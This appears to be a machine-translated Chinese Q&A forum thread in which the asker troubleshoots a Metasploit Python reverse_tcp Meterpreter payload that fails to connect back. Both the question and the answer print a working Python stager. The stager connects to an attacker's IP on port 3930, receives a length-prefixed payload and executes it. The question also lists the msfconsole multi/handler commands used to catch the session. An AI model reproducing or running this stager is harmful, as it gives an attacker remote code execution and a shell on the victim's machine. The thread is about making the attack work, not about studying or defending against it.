2016-03-05 26 views
0

我已经使用msfvenom创建以下蟒蛇有效载荷:Meterpreter就会无法连接回 - Python的

import socket,struct 
s=socket.socket(2,socket.SOCK_STREAM) 
s.connect(('MY PUBLIC IP',3930)) 
l=struct.unpack('>I',s.recv(4))[0] 
d=s.recv(l) 
while len(d)<l: 
    d+=s.recv(l-len(d)) 
exec(d,{'s':s}) 

那么我已经打开了msfconsole,并做了以下内容:

use exploit/multi/handler 
set payload python/meterpreter/reverse_tcp 
set LHOST 192.168.0.186 (MY LOCAL IP) 
set LPORT 3930 
exploit 

它开始反向TCP处理程序在192.168.0.186:3930上,并启动负载处理程序。但是,当我在另一台计算机上运行该脚本时,等待大约一分钟后,有效负载会超时,并且msfconsole不会注册任何内容。我有端口在路由器上转发3930。我在这里做错了什么?

回答

0

这是我用来在Unix系统上使用反向TCP的代码,以及你提供的细节。但是,我错误搜索后偶然发现了你的帖子,所以这不是100%完美无瑕。过去我已经完成了它的工作,但最近它开始滞后。它会在内部系统上运行一次,但之后的任何内容都会给我提供相同的错误消息。在广域网上进行此操作时,我也会得到相同的信息,与LAN相反,但它不会在第一时间运行。你有什么ISP?它可能完全依赖于此。

import socket,struct 
s=socket.socket(2,1) 
s.connect(('IP ADDRESS',3930)) 
l=struct.unpack('>I',s.recv(4))[0] 
d=s.recv(4096) 
while len(d)!=l: 
    d+=s.recv(4096) 
exec(d,{'s':s})